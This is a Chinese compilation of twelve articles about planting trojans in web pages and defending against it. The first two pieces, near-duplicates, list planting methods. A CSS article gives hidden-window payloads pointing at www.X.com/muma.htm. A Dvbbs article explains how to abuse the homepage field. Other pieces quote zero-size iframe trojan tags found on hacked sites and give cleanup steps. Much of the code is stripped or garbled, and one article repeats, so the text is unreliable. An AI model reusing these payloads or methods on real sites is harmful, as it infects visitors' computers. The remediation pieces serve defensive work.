以下是小编整理的介绍几种常见网页挂马方法(挂马代码),本文共12篇,欢迎阅读分享,希望对大家有帮助。
篇1:介绍几种常见网页挂马方法(挂马代码)
各种网页木马挂马的代码(注意)
1、嵌入网页
2、PHP网页挂马
3、图片木马
4、邮件木马
5、flash木马
网页木马地址 插入木马地址
width=10 height=10“, ”GET“ 宽度和高度,方式
后面的照添,更改木马地址就可以了,
介绍几种常见网页挂马方法(挂马代码)
,
6、做123.JS文件木马
document.write(”“)
7、不点出现连接的木马
页面要显示的内容
8、asp木马超级隐藏
copy C:\Inetpub\wwwroot\mm\11.htm \\.\C:\Inetpub\wwwroot\mm\com1.htm
、利用邮箱传播木马
这里主要点HTML格式—-在里面写上以下这段代码:
篇2:介绍几种常见网页挂马方法
各种网页木马挂马的代码(注意)
1、嵌入网页
2、PHP网页挂马
3、图片木马
4、邮件木马
5、flash木马
网页木马地址 插入木马地址width=10 height=10”, “GET” 宽度和高度,方式后面的照添,更改木马地址就可以了,
介绍几种常见网页挂马方法
,
6、做123.JS文件木马
document.write(“”)
再把这段代码写到 主页上!
7、不点出现连接的木马
页面要显示的内容
8、asp木马超级隐藏
copy C:\Inetpub\wwwroot\mm\11.htm \\.\C:\Inetpub\wwwroot\mm\com1.htm,利用邮箱传播木马
这里主要点HTML格式—-在里面写上以下这段代码:
篇3:揭秘 所用的CSS代码挂马方法
跟着Web2.0的普及,各种网页殊效用得越来越多,这也给 一个可乘之机,他们发现,用来制作网页殊效的CSS代码,也可以用来挂马。而比较讽刺的是,CSS挂马方式实在是从防范E挂马的CSS代码演变而来。
安天实验室阿楠:安全工程师,从事病毒分析多年。
网站挂马的手段最初非常单一,但是跟着Web2.0技术以及Blog、Wiki等广泛的应用,挂马也涌现出各种各样的技术,其中CSS挂马方式,可以说是Web2.0时代 的最爱。有很多非常知名的网站都被 用CSS挂马入侵过。
在我印象中,记忆最深刻的一次是 CSS挂马。当时, 推出没有多久,就有很多百度用户收到了类似“哈,节日快乐呀!强烈热闹庆祝,心情好好,记住要想我!hi.baidu.com/XXXXX”的站内动静。
因为网址是 的网址,很多用户以为不会存在安全题目,加上又有可能是自己朋友发来的,因此会绝不犹豫地点击进入。但是进入指定的网址后,用户就会感染蠕虫病毒,并继承传播。
因为蠕虫扩散非常严峻,终极导致 不得不发布官方声明提醒用户,并且大费周折地在服务器中清除蠕虫的恶意代码。那一次的挂马事件利用的就是 CSS模板功能,通过变形的expression在CSS代码中动态执行脚本,让指定的远程恶意代码文件在后台静静运行并发送大量伪造信息。
我建议大家在点击目生链接时,要多个心眼,大网站也是可能被挂马的。大家在上网时,最好仍是使用一些带网页木马拦截功能的安全辅助工具。
为什么选择CSS挂马?
在Web1.0时代,使用E挂马对于 而言,与其说是为了更好地实现木马的躲藏,倒不如说是无可奈何的一个选择。在简朴的HTML网页和缺乏交互性的网站中, 可以利用的手段也非常有限,即使采取了复杂的伪装,也很轻易被识破,还不如E来得直接和有效。
但如今交互式的Web2.0网站越来越多,答应用户设置与修改的博客、SNS社区等纷纷泛起。这些互动性非常强的社区和博客中,往往会提供丰硕的功能,并且会答应用户使用CSS层叠样式表来对网站的网页进行自由的修改,这促使了CSS挂马流行。
小百科:
CSS是层叠样式表(CascadingStyleSheets)的英文缩写。CSS最主要的目的是将文件的结构(用HTML或其他相关语言写的)与文件的显示分隔开来。这个分隔可以让文件的可读性得到加强、文件的结构更加灵活。
在利用CSS挂马时,往往是借着网民对某些大网站的信任,将CSS恶意代码挂到博客或者其他支持CSS的网页中,当网民在访问该网页时恶意代码就会执行。这就犹如你去一家着名且证照齐全的大病院看病,你非常信任病院,但是你所看的门诊却已经被庸医外包了下来,并且打着病院的名义利用你的信任成功欺骗了你,
但是当你事后去找人算账时,病院此时也往往一脸无辜。对于安全工程师而言,CSS挂马的排查是必备常识。
CSS挂马攻防实录
攻CSS挂马方式较多,但主流的方式是通过有漏洞的博客或者SNS社交网站系统,将恶意的CSS代码写入支持CSS功能的个性化页面中。下面我们以典型的CSS挂马方式为例进行讲解。
方式1:
Body
“background-image”在CSS中的主要功能是用来定义页面的背景图片。这是最典型的CSS挂马方式,这段恶意代码主要是通过“background-image”配合t代码让网页木马静静地在用户的电脑中运行。
那如何将这段CSS恶意代码挂到正常的网页中去呢? 可以将天生好的网页木马放到自己指定的位置,然后将该段恶意代码写入挂马网站的网页中,或者挂马网页所调用的CSS文件中。
小百科:
使用Body对象元素,主要是为了让对象不再改变整个网页文档的内容,通过Body对象的控制,可以将内容或者效果控制在指定的大小内,犹如使用DIV对象那样精确地设置大小。
方式2:
Body
background-image: url(t:open(“www.X.com/muma.htm”,”newwindow”,”border=”1″ Height=0, Width=0, top=1000, center=0, toolbar=no,menubar=no, scrollbars=no,resizable=no,location=no,status=no”))
方式1的CSS挂马技术,在运行时会泛起空缺的页面,影响网页访问者正常的访问,因此比较轻易发现。不外在方式2中的这段代码,使用了t的Open开窗,通过新开一个躲藏的窗口,在后台静静地运行新窗口并激活访问网页溢出木马页面,不会影响访问者观看网页内容,因此更加隐蔽。
防网络服务器被挂马,通常会泛起防病毒软件告警之类的信息。因为漏洞不断更新,挂马种类时刻都在变换,通过客户真个反映来发现服务器是否被挂马往往疏漏较大。准确的做法是常常检查服务器日志,发现异常信息,常常检查网站代码,使用网页木马检测系统,进行排查。
目前除了使用以前的阻断弹出窗口防范CSS挂马之外,还可以在网页中设置CSS过滤,将CSS过滤掉。不外假如你选择过滤CSS的话,首先需要注意自己的相关网页是否有CSS的内容,因此我们仍旧首推用阻断方式来防范CSS。阻断代码如下所示:
emiao1:expression(this.src=”about:blank”,this.outerHTML=”“);
将外域的木马代码的src重写本钱地IE404错误页面的地址,这样,外域的t代码不会被下载。不外阻断方式也有生成致命的弱点,弱点的秘密我们将于下次揭晓。
篇4:wordpress被挂马及清除可疑的植入代码的方法
我有个用wordpress搭建的CMS网站前些日子被浏览器报受攻击了,谷歌的网站管理也工具也提示,还给出了可疑代码和受影响的文章的地址,以前被攻击的经历,那次与这次不同,只是挂了几个黑链,这次不同,因此只能手动找代码清除了,刚开始网上搜了搜相关事例,有些博主是在数据库里清除的,但我的行不通,因为我的问题不在数据库,而在functions.php文件,
清除wordpress挂马代码:
1.先是登陆谷歌网站管理工具,在“故障诊断”下选择“恶意软件”进入存在问题的网址,随便点击一个有问题的网站,谷歌网站管理员工具就会给出“可疑的植入代码”
注:不要在浏览器中执行!
2.在被挂马博客当前主题的functions.php文件中的,找到与谷歌网站管理员工具给出的可疑的植入代码相同的代码,然后把整个php语句删除掉,我找到的整句代码如下:(蓝色部分)
3.然后保存文件,
注:不能确定的博主,可以拿出当前主题的备份主题的functions.php文件替换掉原来的。此外删除掉后,在谷歌网站管理员工具中申请审核,否则chrome浏览器还会报警告。
PS:我对挂马和代码这些了解不是很清楚,只是参照谷歌网站管理工具给出的相应的可疑植入代码进行清理,合理性有待考察。
篇5:Win 7安全和网页挂马
这几年来,国内网页挂马的现象是越来越严重,不管是白道黑道,或攻或防,都围绕着这个问题做文章。我们看到,有利用IE安全漏洞的0day,如去年的XML。或ActiveX控件的0day,如前一阵子的OWC安全漏洞。这一个过程中,安全厂商或是推出自己的IE的Plug-in监测,或是URL拦阻,或是在反病毒上做文章等等。
我对于如反病毒之类的响应类型软件的效果,一直是有保留态度。有兴趣的同时可以参见最近有什么厉害的计算机病毒?一文。真正意义上的安全改进还是要依赖于操作系统一级上的提高。
举个例子,以前在DOS时代给予引导扇区的病毒曾经很流行,但是随着操作系统的改进,在Windows上这类病毒已经销声匿迹了,这是因为它的攻击方式在操作系统一级上已经被阻止了。这种程度上的安全改进,是反病毒软件无法做到的。
Vista由于种种原因,例如性能,在国内就没有普及,
现在还是以XP为主。让我们来看看现在的给予IE/XP的挂马方式吧,绝大情况就是给予0day或是已经打了补丁的安全漏洞(用户可能没有及时更新),加上堆污染,然后感染用户的机器。效果就是用户访问了一个恶意网页,然后中招。
那我们看看,在Win7上,会是什么样子。在Win7上,IE8+DEP+ALSR+SEHOP+Low Right,目前所有的挂马方式,都不能成功。换句话说,就算是IE8有一个0day的安全漏洞,你在Win7上访问到一个被挂了马的恶意网页,也不会被感染。不需要有其它反病毒软件的帮助。当然,如果你一定要直接下载一个EXE文件再运行,就没有办法了。
Win7的性能和兼用型都做的比Vista好了许多。从现在的反馈看,Win7的普及会非常快的。随着XP的换代,困扰大家这么长时间的网页挂马现象会得到非常大的改进。当然,攻击者总会发现新的攻击方式,不过像XP上现在这么容易的攻击方式估计是不会在有了。我也对在安全领域工作的几个朋友提及,要好好评估一下Win7对他们产品带来的影响。新的一轮的洗牌,也就会在这一两年内吧。
篇6:防范 点滴做起 六招防御网页挂马
网页木马能够在用户不知觉的情况下改变用户配置或者下载运行非法程序以实现某种不可告人的目的,当用户访问某个网站时,如果这个网站中有木马文件,则会在没有任何安全提示的情况下,自动下载远程CHM文件中的程序并运行,或者在后台运行网页上的恶意代码。网页木马虽然比较可怕,但是向非典一样,仍然是可防可控的。笔者下面列举了网页木马的常见防范措施,供各位读者参考。
防范措施一:更改系统的环境变量
木马本质上是一种程序,一段恶意代码。其需要运行的话,必须要借助于一定的平台。如VBS、JS平台等等。如果我们能够将这些平台禁用掉,那么即使用户访问的网页中有这些代码,其也不会对用户造成损害。因为其根本不能够在用户的电脑上运行。众所周知,在操作系统中有一个环节变量,在这里可以定义常见应用程序的路径。如果我们在这里将一些比较危险的应用程序的路径去掉,那么木马就会因为找不到可以运行的平台而无疾而终。
我们可以在操作系统的环境变量中,找到PATHEXT变量名,将这里面的一些经常容易被网页木马利用的变量值删除。如可以将VBS、JS等等内容删掉。这些变量是木马经常使用的。不过在更改这个环境变量的值的时候,需要注意最好能够事先对其进行必要的备份,
特别是不能够确认哪些是操作系统或者其他应用程序运行必须的变量的时候,对这个变量值进行备份。这可以防止因为误操作而带来的损失。
防范措施二:要养成看网页源代码的习惯
一个网络安全人员,如何才能够提高网页木马的识别能力呢?俗话说,知己知彼,百战百胜。笔者认为,要提高管理员的木马识别能力,最好的途径就是要学会看网页的源代码。最高明的木马,也需要通过一定的代码来实现。只是有些木马的代码有一定的隐蔽性与欺骗性而已。为此安全人员需要多查看网页源代码。通常情况下,无论多高明的网页木马,都会在源代码中看出一点端倪。通过代码,可以了解木马的工作原理、变现形式、欺骗的手段以及未来的发展趋势等等。只要了解这些内容,在防护木马的时候,才能够对症下药。当然,要能够看懂这些木马,具有一定的难度。不过当能够看懂网页代码的时候,对于安全人员来说,可能是受益无穷。
当我们发现可疑网页,可以点击工具栏上的“查看”按钮,然后选择源文件,就可以看到这个网页的源代码。如上图所示。然后分析其可以的代码。一般来说,网页木马代码虽然有一定的隐蔽性与欺骗性,但是安全人员只要多花点心思,就可以找到相关的规律。其实跟木马制作者勾心斗角的斗争,也是很有趣的一件事情。当发现对方的恶意企图时,你或许会很有成就感。从此一发不可收拾。
篇7:从动网挂马漏洞看网页木马防范
从动网挂马漏洞看网页木马防范
linkboy
动网最近新出的前台管理员、至顶漏洞详细大家都已经很熟悉了,祸不单行,前不久动网又爆出了挂马漏洞。相对于前面提到的漏洞来说,挂马漏洞的危害更大――无需取得任何权限,即可在论坛上挂网页木马,直接危害到广大网民的安全。在这里我将简单介绍一下挂马漏洞的原理和利用方法,以及对于相应网页木马的防范方法。希望广大动网论坛斑竹早日打好补丁,免得自己的论坛变成别人利用的工具。
此次攻击的类型属于跨站攻击,在动网6.0的时候也出现过这种类型的cookies收集漏洞。原理是使动网的调用其他网站的恶意页面,实习跨站攻击。动网6.0的时候是通过伪造上传头像的方法收集用户的cookies,而这次我们把目标瞄准了个人资料的个人主页:
先注册个用户,在个人主页那个空中填写
以后只要你参与的贴子都会自动调用恶意网站,做广告、挂木马、拿cookie...等等,干什么都行。不难想象,只要在热门贴或者置顶贴上回复一下,危害将有多大。
说了利用方法,我们再来看看导致漏洞的原因。打开reg.asp(动网注册页面)查看源程序! UserIM=checkreal(Request.form(”homepage“)) &”|||“& checkreal(Request.form(”OICQ“)) &”|||“& checkreal(Request.form(”ICQ“)) &”|||“& checkreal(Request.form(”msn“)) &”|||“& checkreal(Request.form(”yahoo“)) &”|||“& checkreal(Request.form(”aim“)) &”|||“& checkreal(Request.form(”uc“))
分析动网数据库才明白 UserIM 是TEXT类型用来存储 主页,OICQ,ICQ,msn,yahoo,aim,uc 存储格式 主页|||OICQ|||ICQ|||msn|||yahoo|||aim|||uc。homepage 就是注册时的主页选项,(Request.form(”homepage“)) 从from表单得到数据 ,checkreal 是不是过滤呢,找到看了一下,不是过滤函数. 看来没有对 homepage 处理好!
从分析步骤中可能看出是对 homepage 没有处理好, 下面我们写一个程序来处理一下 homepage 的输入。
UserIM=checkreal(Request.form(”homepage“)) &”|||“& checkreal(Request.form(”OICQ“)) &”|||“& checkreal(Request.form(”ICQ“)) &”|||“& checkreal(Request.form(”msn“)) &”|||“& checkreal(Request.form(”yahoo“)) &”|||“& checkreal(Request.form(”aim“)) &”|||“& checkreal(Request.form(”uc“))
都没处理。一个一个变量去过滤太麻烦我们直接对 UserIM 进入过滤就可以了。在reg.asp 最下面加一个过滤函数”,“过滤”)
fString=replace(fString,“\”,“过滤”)
fString=replace(fString,“--”,“过滤”)
fString=replace(fString,“'”,“过滤”)
fString=replace(fString,“ ”,“过滤”)
fString=replace(fString,“%”,“过滤”)
'fString=replace(fString,CHR(34),“”“)
fString=replace(fString,vbCrlf,”“)
HTMLEncode2=fString
end function
%>
接着reg.asp中用到 UserIM的有两处.查找到 ”UserIM=“ 在这条语句之后加入一条语句UserIM=HTMLEncode2(UserIM) 到此reg.asp文件过滤完了!
当然还有别的文件也用到了UserIM:
1,注册的时候,
2,注册之后可以修改个人信息,
3,管理员在后台修改个人信息
补的方式也都一样,
modifyadd.asp 是修改个人信息时用的文件,
电脑资料
相同的步骤:
1,加上过滤函数
2,查找到 ”UserIM=“ 在这条语句之后加入一条语句
UserIM=HTMLEncode2(UserIM)
考虑到这个漏洞的巨大危害,光靠论坛斑竹打补丁是不够的。作为网民也应该行动起来,熟悉常见网页木马的中毒症状,未雨绸缪,防范于未然。
我们先来看一下目前流行网页木马的种类及其症状:
1. Mshta网页木马:一般装防火墙的朋友会发现要求mshta访问网络,然后会弹出一个空白的asp页面。这个漏洞还是比较老的,但是做为第一个影响xp的ie漏洞还是有很大的危害
2. Chm网页木马:最近比较流行,中毒情况是弹出一个空白的帮助文件。同时这个漏洞还很容易和其他漏洞结合。它是利用chm文件的漏洞实现木马下载的,所以大家在看chm帮助文件时同样要小心。
3. Js网页木马:IE会莫名奇妙的僵死,甚至整个系统僵死几秒钟。很容易判别。
4. Xp2溢出:在我的blog:linkboy.3322.org上就有这样的溢出代码,大家可以看一下,同样会造成系统的不正常僵死。
说了4个类型的网页木马中毒状况,我们在看一下防范方法,有效率90%以上,可以防止90%以上木马在你的机器上被执行,甚至杀毒软件发现不了的木马都可以禁止执行。先说一下原理。
现在网页木马无非有以下几种方式中到你的机器里
1.把木马文件改成BMP文件,然后配合你机器里的DEBUG来还原成EXE,网上存在该木马20%
2.下载一个TXT文件到你机器,然后里面有具体的FTP地址,FTP连上他们有木马的机器下载木马,网上存在该木马20%(mshta变种)
3.也是最常用的方式,下载一个HTA文件,然后用网页控件解释器来还原木马。该木马在网上存在30%以上(mshta网页木马)
4.采用JS脚本,用VBS脚本来执行木马文件,该型木马偷QQ的比较多,偷传奇的少,大概占30%左右
知道了原理那就开始防范,首先把系统文件下的mshta.exe文件改名。然后将注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\ 下为Active Setup controls创建一个基于CLSID的新键值 {6E449683_C509_11CF_AAFA_00AA00 B6015C},然后在新键值下创建一个REG_DWORD 类型的键Compatibility,并设定键值为0x00000400即可。还有windows(winnt)\command\debug.exe和windows(winnt)\ftp.exe都给改个名字 (或者删除)。
如果你觉得手工打补丁很麻烦的话还可以使用一个不错的软件:网络安全助手,最新版本5.7(如图2)。该软件是目前唯一能够针对各种网页木马给出防范措施的软件,使用起来也很方便,只要简单设置一下,然后点击“确定”就可以了。同时软件还有其他一些安全设置,大大加强了Windows的安全性。大家可以在google或百度上搜索一下,下载一个试试。
经过这样的设置后,我专门找别人发的木马网址去测试,实验结果是上了大概20个木马网站,有大概15个瑞星会报警,另外5个瑞星没有反映,而我的机器没有添加出来新的EXE文件,也没有新的进程出现,只不过有些木马的残骸留在了IE的临时文件夹里,没有被执行起来,没有任何危险性。当然,ie漏洞层出不穷,作为网民平时仍要小心,注意微软的漏洞报告,及早打上补丁。
篇8:微软office组件爆安全漏洞 伺机网页挂马
近日,金山毒霸全球反病毒监测中心发现,7月11日公布的微软office 组件存在的access 快照ActiveX漏洞已经遭 利用, 可利用该漏洞在特定网页植入木马,用户访问这些网站,会自动下载并执行木马,
金山毒霸反病毒专家李铁军表示,由于office用户升级产品版本的诉求并不强烈,再加上微软office是安装量非常高的应用软件,在缺省情况下,即使很多不用access,也会被安装该组件,同时office组件的漏洞修补一般并不被大多数office用户所重视,往往不去修补,因此该漏洞将给用户带来极大风险。
李铁军担心地指出,此外由于一些使用盗版office的用户担心打补丁会影响盗版软件的使用,而故意不去修补,所以该漏洞的影响将会比较持久。李铁军断定此漏洞将为 产业链中的网马制作者热衷采用。
据了解,网页“挂马(种植木马程序)”技术难度并不高,很多的著名网站均出现过网页被“挂马”的事件,用户只是浏览网页,都有可能染上木马,有数据显示超过70%的木马已经通过网页漏洞进行传播。李铁军表示,鉴于此漏洞持续影响性较长,仅依靠良好的上网习惯很难幸免,
金山毒霸反病毒工程师表示,此次漏洞涉及的office组件包括Snapshot Viewer for Microsoft Access、Microsoft Office Access 、Microsoft Office Access 、Microsoft Office Access 。目前微软尚未发布补丁。
针对该漏洞以及由此引发的恶意攻击,金山毒霸全球反病毒监测中心已经进行了紧急处理,用户使用金山清理专家(www.duba.net/qing/)的漏洞修复功能完成漏洞的检测和修补,或是手动修改注册表相关键值。将HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\InternetExplorer\ActiveX Compatibility下的 {F0E42D50-368C-11D0-AD81-00A0C90DC8D9}{F0E42D60-368C-11D0-AD81-00A0C90DC8D9} {F2175210-368C-11D0-AD81-00A0C90DC8D9}这三个键的“Compatibility Flags”值设置为0x00000400即可有效防范利用该漏洞的恶意攻击。同时,金山毒霸反病毒工程师特别提示广大用户,关注微软相关补丁的发布,一旦升级,应该立即修补
篇9:DedeCms被挂马的解决方法
打开公司网站首页,360和杀毒软件就对一个网页进行了劫持,怎么网页受到了病毒侵害呢,通过浏览器查看网页的源代码,发现了一段陌生的代码
iframesrc=www.xxx.cn/one/a9.htmwidth=50height=0border=0/iframe
一看到这段代码,就想起了之前曾经遭遇的Iframe攻击,一种ARP病毒,当时就是由于内网的一台机器感染了ARP病毒,然后不断的进行发包,造成了每台机器在打开网页的时候,都会出现错误,最根本的特征就是在网页中插入这样一条类似的iframe代码,将一个广告网页嵌入进来。当时的解决方案:
1 开启ARP保护
2 清理一切临时文件,包括IE和系统的,特别是IE,很多缓存的页面可能已经感染了病毒。
3 修复系统漏洞,可以用360的系统修复功能
4 进行一次全面的杀毒处理,最好寻得专杀工具进行一次全面杀毒
然后我就按着头脑中已定的逻辑去逐步操作,本以为这样就可以解决问题了,但是再处理之后,将那段攻击代码 删除之后,过了没多久又重新被挂马,
我也寻得多种木马专杀等工具进行查杀,但是并没有找到问题的根源。
然后我只得到网络上寻得救援。
在不经意间,我发现了,可能与DedeCms有关。一想我的程序应该没有多大问题,而且偏偏攻击的是我的主页,静态页面,而公司网站也有设计部使用DedeCms系统进行管理和维护。
在这个启蒙下,感觉寻得一丝曙光。然后我就让设计部着手去寻得问题的根源
1 进入DedeCms管理系统,查看文件,找寻可疑文件。
果然,在仔细搜寻一番之后,发现很多陌生文件的,有的文件以为名,有的以简单aa,bb为名,这些可疑文件的命名很不规范,有的是JS文件,有的是PHP,有的是HTML,看来这就是毒源了。查看里面的代码,发现一般都是乱码。将这些可疑文件全部删除。
2 看来问题真的出在这里,然后,升级DedeCms,修复系统漏洞
3 关闭一些不用的功能,会员功能等。
4 将权限进行重新划分,对于一些具有写入权限的目录一定要严格限制。
本文来自:www.cnblogs.com/yank/archive/2008/10/16/1312341.html
篇10:如何用IIS防火墙清除“挂马”代码?WEB安全
网站被反复“挂马”,怎么办?很多企业网管经常发现,在清除服务器硬盘 ASP / PHP 文件中的“挂马”代码连接之后,过一会又被“入侵者”加上,这些是非常头疼的问题,
其实利用IIS防火墙可以解决这个难题,使用“正则表达式”模式匹配“挂马”代码,从 IIS 中清除“挂马”代码连接。不用修改硬盘 ASP / PHP 文件,不在担心错误修改客户 ASP / PHP 文件,
对于 <script. src=%AA%BB%CC%DD%EE%FF%GG></script> 这样的加密URL连接,只需要使用一个“正则表达式”,即可从IIS中过滤整个服务器中类似的“挂马”代码连接。对于 <iframe. src=www.xxxx.com/muma.htm width=0 height=0></iframe> 这样的,也只需要通过“正则表达式”,即可轻松清除。
另外,IIS防火墙的智能识别标准HTML网页代码,可以对HTML/ASP/PHP/ASP.NET等网页的顶部和底部的“挂马征”代码进行自动清除操作。
篇11:个人网站被挂马的解决方法
做站的朋友都有过网站被挂马的经历,说实话,我对这种行为非常反感,因为我的网站赚钱指南(melejia.com)开通不到2个月,就发现被挂马了,当时花费了我一个晚上的时间才清除了木马,又累又气,后来又被挂了两次,好在有了经验,不用花费多少时间就搞好了。对于网站被挂马,我认为最好的办法还是“防”为主,建站系统最好用正规的(我用的是动易),不断按要求加补丁程序防漏洞,还有,后台密码尽量设置复杂一些,电脑系统也要加强,比如装上防木马软件,杀毒软件等(我用的是360安全卫士)。反正有网络就有木马,病毒程序层出不穷,站长们要非常小心!下面是站长解决中马的方法(仅对动易系统):
已中木马的动易系统网站全面解决办法
如果你发现你网站已经中招(大部分表现为被人插入iframe代码,首页或者每个页面),可以参照以下办法进行处理:
1、打上最新安全补丁!!!。
2、对比动易所有的文件,发现多出来的文件,立即下载备份(供分析用)然后从站点中删除!如果是文件大小、日期不一致的,编辑该文件,看是否有不良代码。 比较喜欢在conn.asp和config.asp里面放不良代码。如果发现有,先删除。最近还发现很多木马代码 入到了JS文件中,建议直接用动易程序原JS目录覆盖一次网站的JS目录。然后上传动易官方最新文件替换。conn.asp上传后,记得将数据库路径修改正确。
3、查看所有的JPG,GIF文件名,凡是发现带asp文件名的,立即下载备份(供分析用)然后从站点中删除!( 比较喜欢在admin/image/......这种地方藏木马,曾经有一位站长的站就被人在这个目录下建立了一个.asp的目录,里面再放一个JPG木马文件。
4、以上2、3步骤是检查木马程序文件,完成后,就该检查后台模板了。首先当然是立刻修改管理员密码(能动你模板说明就能进你后台了),接着查看站内日志是否有非法登陆或者是日志被删除了,然后在模板管理中,用查找替换模板的方法,查询你网站页面 入的那个iframe代码,
5、停止网站所有的上传功能,检查所有会员名,发现带asp的(包括*.asa、*.cdx、*.cer),全部删除(请自行斟酌,为了网站安全,损失点也没办法),同时,在网站选择题那设定禁止注册:asp 这样的会员。
6、如果你网站的数据库使用的是默认的Database/PowerEasy.mdb数据库路径和文件名,请立即更改!切记!
7、登陆后台后网页一片空白的处理方法,用对应版本原始的admin文件夹覆盖你的管理目录中的文件,并将目录中多出来的文件删除掉。如果后台菜单栏点不开的,请重新上传文件/JS/prototype.js。
8、登陆时提示验证码不正确的,一般表现为验证码多了下划线。请用原始的动易文件覆盖你网站根目录上的images文件夹下面的几个后缀为fix文件,以及/inc eckcode.asp文件。
9、最好重新生成所有的HTML文件以及所有的JS文件。
10、以上方法都试了还不行,那就备份数据库,然后删除全站,再重新上传。
下是:rhongsheng 提供的一个方案:
-------------------
1.修改/inc ecklist.asp文件中的94行,在其中加入Or InStr(iname, ”.“) >0 。该代码起到注册是限制注册用户名包含有“.”。或者在其中限制包含”asp“也可以Or InStr(iname, ”asp") >0。可以两者一起限制。经过本人测试,限制之后eval后门执行程序起不了做用。
------------------
以上办法供参考,有更多措施将进一步补充完善。
另外,需要补充一下的是:
1.动易系统内自带的“禁止注册的用户名”中即使加了.asp|asp|限制都依然可以注册,所以为防止出现意外,建议暂时关闭会员注册,或根据以上的临时修改方案暂时解决。
2.假如你网站的数据库使用的是默认的Database/PowerEasy2006.mdb数据库路径和文件名,请立即更改!切记!
祝你的站天天平安,流量不断!
篇12:小谈网站被挂马的防范及解决方法
本来草根站长做个站不容易,奈何某些前辈不自重,还来难为咱们,为了他们的一己私欲,牺牲了我们的站点不说,关键是打击了咱们的建站激情...
本来草根站长做个站不容易,奈何某些前辈不自重,还来难为咱们,为了他们的一己私欲,牺牲了我们的站点不说,关键是打击了咱们的建站激情,我就我所知道的给一些新手站长写点防范和解决之道,高手可以一笑带过,有不对的地方敬请指正!
第一,免费的网站论坛什么的,就不要作为自己的主要精力投入点了,因为即使被挂马或者被删除,他们也不用负什么责任;免费空间也一样;
第二,程序的选择请尽量选择一些口碑比较好的,比较有名的程序,当然不是说他们不会有安全漏洞,相对来说,他们的漏洞少得多,而且修补很即时;
第三,现在的程序一般都有验证码,安全问题等功能,建议打开,特别是对于管理员来说,一定要,后台登录页面的名字,建议更改下,改成自己记得住但不是默认管理页面的名字;顺便提下,install目录一定要删除,很多程序都有这个提示的;
第四,一个强健的管理密码,虽然说中了键盘记录之类的工具你的密码再复杂都没用,但是,对于一些基本的猜解工具来说,它就是你安全的保障!另外,输入密码的时候也请注意,现在的输入法都有软键盘,嘿嘿,大家要利用起来,用鼠标点击软键盘输入你的密码,这样,那些键盘记录工具也就能防范一部分了;
第五,管理者本身的电脑环境也很重要,杀毒软件一定要装,也不推荐哪款,毕竟各有所长,我用的瑞星,卡巴不是说他不好,只是我有些地方忍受不了它;装了杀毒软件不是就万事大吉了,还得经常更新,保证对于最新的病毒也能有所防范;
第六,良好的上网习惯,现在一些马儿很牛的,能直接关闭你的杀毒软件,但是,前提是你要触发它,比如,你上网的时候,看见一个东西很吸引人,一点,中招厄…这就是触发;很多马儿也就是这样下载下来的,中间的过程可以多上网了解下;
第七,备份,这点很重要,而且是要经常备份,如果你的服务提供商有这个服务,那是最好不过的了,不过,自己有时间的话,还是要经常备份自己的网站,一旦发生点什么事情,嘿嘿,你就知道备份的好处了,备份,首先要有一个完整程序的备份,然后,是模板文件的定期备份,而且不能只有一个备份,比如,按日期存档备份,每星期一个存档,多好~~ 出问题还原就行了;数据库也记得备份哦~~ 不过挂马者一般不会动你的数据库和其他文件,他的目的,就是让你帮他宣传或者传播;
第八,遇到挂马的时候,不要把你的挂马页面到处乱发,即使发,也要经过处理,不然别人一点击你发的页面,他也中招,那你不是也成了帮凶?怎么处理过? 在你的网址字母中间加一些干扰的汉字啊什么都行,别人就打不开了,但是他能看得懂;(有些牛人很喜欢点挂马页面,为啥? 他喜欢收集别人的小马,哈哈,但是如果没那个技术能防得住,劝大家还是不要去试)
第九,挂马页面一般都在首页,页头,页脚,这些地方都是被加了代码,仔细检查下就能发现,删除就完了,不能发现的直接用以前的备份还原,建议还是加上第十条,要彻底解决,还得有个好的环境加好的习惯;
第十,发现中马以后,第一时间联系你的服务商,看看是不是他们的网络环境出现问题,也好及时处理,等他们那边把问题都解决以后,你这边再还原一下就ok了,
★挂启启事
★马
文档为doc格式
